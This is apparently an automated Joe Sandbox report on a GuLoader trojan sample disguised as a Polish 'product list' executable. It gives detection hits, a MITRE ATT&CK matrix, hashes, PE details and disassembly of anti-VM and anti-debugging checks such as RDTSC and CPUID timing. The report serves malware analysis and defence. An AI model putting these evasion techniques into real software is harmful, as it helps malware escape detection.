    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesdclt.exe.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWEBCHECK.DLL.MUID vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAuxiliaryDisplayCpl.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMBLCTR.EXE.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameEFSADU.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWPDMTPDR.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameNetworkItemFactory.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaudiodev.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaelupsvc.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamejscript.dll.muiH vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpedit.dll.muij% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSOERES.DLL.MUIj% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167374879.00000000004A0000.00000008.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exeBinary or memory string: OriginalFilenameFarveskrmene.exe vs Lista produkt#U00f3w.exe
    Source: Lista produkt#U00f3w.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal80.troj.evad.winEXE@1/0@0/0
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeFile created: C:\Users\user\AppData\Local\Temp\~DF9757055F2834F01E.TMPJump to behavior
    Source: Lista produkt#U00f3w.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Lista produkt#U00f3w.exeVirustotal: Detection: 34%
    Source: Lista produkt#U00f3w.exeReversingLabs: Detection: 17%

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_00406613 push edx; ret 0_2_00406614
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_00405A15 push esp; ret 0_2_00405A20
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_00405889 push eax; ret 0_2_0040588C
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_0040576B push edi; retf 0_2_004057A0
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_00404B1B push esp; retn 0000h0_2_00404B1D
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_0040459E pushfd ; ret 0_2_004045A0
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D71B3F pushfd ; iretd 0_2_01D71CAC
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D71CA1 pushfd ; iretd 0_2_01D71CAC
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D70D16 0_2_01D70D16
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D70511 0_2_01D70511
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D71301 0_2_01D71301
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D70C5E 0_2_01D70C5E
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeRDTSC instruction interceptor: First address: 0000000001D71972 second address: 0000000001D71972 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F23ACD81D8Ah 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 cmp bx, ax 0x00000023 dec ecx 0x00000024 cmp dh, ah 0x00000026 cmp ecx, 00000000h 0x00000029 jne 00007F23ACD81D6Ah 0x0000002b push ecx 0x0000002c cmp bl, al 0x0000002e cmp bl, cl 0x00000030 call 00007F23ACD81D9Fh 0x00000035 call 00007F23ACD81D9Ah 0x0000003a lfence 0x0000003d mov edx, dword ptr [7FFE0014h] 0x00000043 lfence 0x00000046 ret 0x00000047 mov esi, edx 0x00000049 pushad 0x0000004a rdtsc
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D707C4 rdtsc 0_2_01D707C4
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

    Anti Debugging:

    barindex
    Found potential dummy code loops (likely to delay analysis)Show sources
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeProcess Stats: CPU usage > 90% for more than 60s
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D707C4 rdtsc 0_2_01D707C4
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D72B82 mov eax, dword ptr fs:[00000030h]0_2_01D72B82
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D72D69 mov eax, dword ptr fs:[00000030h]0_2_01D72D69
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D70D16 mov eax, dword ptr fs:[00000030h]0_2_01D70D16
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D7111A mov eax, dword ptr fs:[00000030h]0_2_01D7111A
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D718E2 mov eax, dword ptr fs:[00000030h]0_2_01D718E2
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D730ED mov eax, dword ptr fs:[00000030h]0_2_01D730ED
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167403263.00000000008E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167403263.00000000008E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: Lista produkt#U00f3w.exe, 00000000.00000002.3167403263.00000000008E0000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeCode function: 0_2_01D71B3F cpuid 0_2_01D71B3F
    Source: C:\Users\user\Desktop\Lista produkt#U00f3w.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Virtualization/Sandbox Evasion11OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Information Discovery212Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Lista produkt#U00f3w.exe34%VirustotalBrowse
    Lista produkt#U00f3w.exe17%ReversingLabsWin32.Trojan.Vebzenpak

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckLista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comLista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtLista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.Lista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueLista produkt#U00f3w.exe, 00000000.00000002.3168905603.0000000003647000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oeLista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/Lista produkt#U00f3w.exe, 00000000.00000002.3168785172.0000000003460000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:411100
                Start date:11.05.2021
                Start time:16:11:34
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 52s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Lista produkt#U00f3w.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal80.troj.evad.winEXE@1/0@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 30.8% (good quality ratio 15.9%)
                • Quality average: 28.9%
                • Quality standard deviation: 34.1%
                HCA Information:
                • Successful, ratio: 53%
                • Number of executed functions: 20
                • Number of non-executed functions: 20
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):5.711108381776406
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.15%
                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:Lista produkt#U00f3w.exe
                File size:81920
                MD5:c7f305d2e4f5e91e8118ac32ec796b0c
                SHA1:c477a3d238b96c2a58e77bb7c818775e23f7d656
                SHA256:0d28b94959edb70309a2754a83f2c9230b3176618ab571995d81955751ca2dbe
                SHA512:6eebcaff0963b5a69f574ceb0eb11f07ac1e6a195476c32b863e026f825f563e6b2406f7e6f34cc2ade6515cb14980e2be471a010fc8c8cf8727faa4f1421b56
                SSDEEP:1536:cDMp+5asYexpjWzziwuVlCqRryDqRZkD:cV57+iwuV9RZk
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......`.....................0............... ....@................

                File Icon

                Icon Hash:b09298b8cc8a19c6

                Static PE Info

                General

                Entrypoint:0x4013f0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x6099DDA9 [Tue May 11 01:28:09 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:ec8e962978786706cf0189109090c85e

                Entrypoint Preview

                Instruction
                push 00401F34h
                call 00007F23AC9F8F63h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                inc eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edx+ecx*2-47h], cl
                aas
                mov byte ptr [ebx+0Bh], dh
                inc edi
                mov eax, 8AB5048Eh
                les ecx, fword ptr [edx+09h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax], eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                call 00007F23F8A29D04h
                push ebp
                dec ebp
                dec ecx
                dec esi
                dec ecx
                inc esi
                dec ecx
                inc ebx
                inc ebp
                dec esi
                push esp
                add byte ptr [eax], cl
                inc ecx
                add byte ptr [eax], al
                add byte ptr [eax], al
                add bh, bh
                int3
                xor dword ptr [eax], eax
                push es
                into
                sbb bh, byte ptr [esi]
                or esp, dword ptr [eax+56B54785h]
                jnp 00007F23AC9F8FD3h
                or eax, dword ptr [edi+33h]
                push ebp
                jc 00007F23AC9F8F35h
                sub dword ptr [esi-6Eh], edx
                xchg byte ptr [edi+eax*2], dh
                xchg dword ptr [ebp-3B91C6C1h], edx
                push ebp
                pop eax
                cmp cl, byte ptr [edi-53h]
                xor ebx, dword ptr [ecx-48EE309Ah]
                or al, 00h
                stosb
                add byte ptr [eax-2Dh], ah
                xchg eax, ebx
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                cmp byte ptr [edx], cl
                add byte ptr [eax], al
                and al, 09h
                add byte ptr [eax], al
                add byte ptr [edi], al
                add byte ptr [edx+65h], al
                arpl word ptr [ebp+72h], si
                jnc 00007F23AC9F8FD7h
                add byte ptr [47001201h], cl
                jc 00007F23AC9F8FE7h
                jo 00007F23AC9F8FE2h
                jnc 00007F23AC9F8FD4h

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x111d40x28.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000xc1c.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                IMAGE_DIRECTORY_ENTRY_IAT0x10000x158.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x107d40x11000False0.422291475184data6.18941304283IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data0x120000x11f40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc0x140000xc1c0x1000False0.291015625data3.0223027499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x143740x8a8data
                RT_GROUP_ICON0x143600x14data
                RT_VERSION0x140f00x270dataChineseTaiwan

                Imports

                DLLImport
                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr

                Version Infos

                DescriptionData
                Translation0x0404 0x04b0
                InternalNameFarveskrmene
                FileVersion1.00
                CompanyNameAsso Filler
                ProductNameAsso Filler
                ProductVersion1.00
                FileDescriptionAsso Filler
                OriginalFilenameFarveskrmene.exe

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                ChineseTaiwan

                Network Behavior

                No network behavior found

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Start time:16:12:40
                Start date:11/05/2021
                Path:C:\Users\user\Desktop\Lista produkt#U00f3w.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\Lista produkt#U00f3w.exe'
                Imagebase:0x400000
                File size:81920 bytes
                MD5 hash:C7F305D2E4F5E91E8118AC32EC796B0C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >

                  Execution Graph

                  Execution Coverage:3.4%
                  Dynamic/Decrypted Code Coverage:72.3%
                  Signature Coverage:21.2%
                  Total number of Nodes:788
                  Total number of Limit Nodes:10

                  Graph

                  execution_graph 2951 408444 __vbaChkstk 2952 408491 __vbaAryConstruct2 __vbaStrCat #617 __vbaVarTstNe __vbaFreeVarList 2951->2952 2953 40852a 7 API calls 2952->2953 2954 4085eb #536 __vbaStrMove __vbaFreeVar 2952->2954 2956 4085b6 2953->2956 3082 402d94 2954->3082 2958 4085e4 2956->2958 2959 4085c7 __vbaHresultCheckObj 2956->2959 2957 40862f __vbaSetSystemError 2960 408647 2957->2960 2961 4089db 2957->2961 2958->2954 2959->2954 2962 408650 __vbaNew2 2960->2962 2963 40866b 2960->2963 2964 4089e5 __vbaSetSystemError 2961->2964 2962->2963 2969 4086cc 2963->2969 2970 4086ac __vbaHresultCheckObj 2963->2970 2965 408a00 2964->2965 2966 408bc5 2964->2966 2967 408a24 2965->2967 2968 408a09 __vbaNew2 2965->2968 2971 408bcf __vbaSetSystemError 2966->2971 2976 408a85 2967->2976 2977 408a65 __vbaHresultCheckObj 2967->2977 2968->2967 2978 40870b __vbaHresultCheckObj 2969->2978 2979 40872e 2969->2979 2970->2969 2972 408bea 2971->2972 2973 408f0e 2971->2973 2974 408bf3 __vbaNew2 2972->2974 2975 408c0e 2972->2975 2985 408ff9 2973->2985 2986 408fd9 __vbaHresultCheckObj 2973->2986 2974->2975 2981 408c6f 2975->2981 2982 408c4f __vbaHresultCheckObj 2975->2982 2987 408ac4 __vbaHresultCheckObj 2976->2987 2988 408ae7 2976->2988 2977->2976 2980 408735 __vbaFreeObj 2978->2980 2979->2980 2983 408772 2980->2983 2984 408757 __vbaNew2 2980->2984 2996 408cd1 2981->2996 2997 408cae __vbaHresultCheckObj 2981->2997 2982->2981 2998 4087d3 2983->2998 2999 4087b3 __vbaHresultCheckObj 2983->2999 2984->2983 3080 410546 8 API calls 2985->3080 3081 401b8d 6 API calls 2985->3081 2986->2985 2989 408aee __vbaStrMove __vbaFreeObj #535 2987->2989 2988->2989 2991 408b49 2989->2991 2992 408b2e __vbaNew2 2989->2992 2990 409036 2993 409065 2990->2993 2994 409045 __vbaHresultCheckObj 2990->2994 2995 408b53 __vbaObjSetAddref 2991->2995 2992->2995 3000 40906c __vbaStrCopy 2993->3000 2994->3000 3002 408b82 2995->3002 3001 408cd8 __vbaFreeObj 2996->3001 2997->3001 3008 408812 __vbaHresultCheckObj 2998->3008 3009 408835 2998->3009 2999->2998 3005 4090a6 3000->3005 3003 408d12 3001->3003 3004 408cf7 __vbaNew2 3001->3004 3006 408bb3 3002->3006 3007 408b93 __vbaHresultCheckObj 3002->3007 3015 408d73 3003->3015 3016 408d53 __vbaHresultCheckObj 3003->3016 3004->3003 3010 4090d5 3005->3010 3011 4090b5 __vbaHresultCheckObj 3005->3011 3012 408bba __vbaFreeObj 3006->3012 3007->3012 3013 40883c __vbaStrMove __vbaFreeObj 3008->3013 3009->3013 3014 4090dc __vbaFreeStr __vbaStrCopy 3010->3014 3011->3014 3012->2966 3017 408874 __vbaNew2 3013->3017 3018 40888f 3013->3018 3019 409124 3014->3019 3023 408db2 __vbaHresultCheckObj 3015->3023 3024 408dd5 3015->3024 3016->3015 3017->3018 3025 4088f0 3018->3025 3026 4088d0 __vbaHresultCheckObj 3018->3026 3020 409153 3019->3020 3021 409133 __vbaHresultCheckObj 3019->3021 3022 40915a __vbaFreeStr 3020->3022 3021->3022 3027 409195 __vbaObjSet 3022->3027 3028 40917a __vbaNew2 3022->3028 3029 408ddc __vbaFreeObj 3023->3029 3024->3029 3030 4088f7 __vbaChkstk 3025->3030 3026->3030 3038 4091e6 3027->3038 3028->3027 3031 408e19 3029->3031 3032 408dfe __vbaNew2 3029->3032 3034 408943 3030->3034 3041 408e7a 3031->3041 3042 408e5a __vbaHresultCheckObj 3031->3042 3032->3031 3035 408974 3034->3035 3036 408954 __vbaHresultCheckObj 3034->3036 3037 40897b __vbaChkstk __vbaLateIdSt __vbaFreeObj __vbaFreeVar 3035->3037 3036->3037 3037->2961 3039 4091f7 __vbaHresultCheckObj 3038->3039 3040 40921a 3038->3040 3044 409221 __vbaLateIdCallLd __vbaStrVarMove __vbaStrMove 3039->3044 3040->3044 3043 408e81 __vbaChkstk 3041->3043 3042->3043 3045 408ecb 3043->3045 3046 4092a8 3044->3046 3047 408efc 3045->3047 3048 408edc __vbaHresultCheckObj 3045->3048 3049 4092d7 3046->3049 3050 4092b7 __vbaHresultCheckObj 3046->3050 3051 408f03 __vbaFreeObj 3047->3051 3048->3051 3052 4092de __vbaFreeStr __vbaFreeObjList __vbaFreeVar 3049->3052 3050->3052 3051->2973 3053 409339 __vbaObjSet 3052->3053 3054 40931e __vbaNew2 3052->3054 3056 40938a 3053->3056 3054->3053 3057 40939b __vbaHresultCheckObj 3056->3057 3058 4093be 3056->3058 3059 4093c5 __vbaLateIdCallLd __vbaI4Var 3057->3059 3058->3059 3060 40943f 3059->3060 3061 40946e 3060->3061 3062 40944e __vbaHresultCheckObj 3060->3062 3063 409475 __vbaFreeObjList __vbaFreeVar 3061->3063 3062->3063 3064 4094af 3063->3064 3065 4094c0 __vbaHresultCheckObj 3064->3065 3076 4094e0 3064->3076 3065->3076 3066 4094f0 __vbaNew2 3066->3076 3067 40952e __vbaObjSet 3067->3076 3068 40956d __vbaHresultCheckObj 3069 409597 __vbaStrMove 3068->3069 3069->3076 3070 4095eb __vbaHresultCheckObj 3071 409612 __vbaFreeStr __vbaFreeObj 3070->3071 3072 40963d __vbaNew2 3071->3072 3071->3076 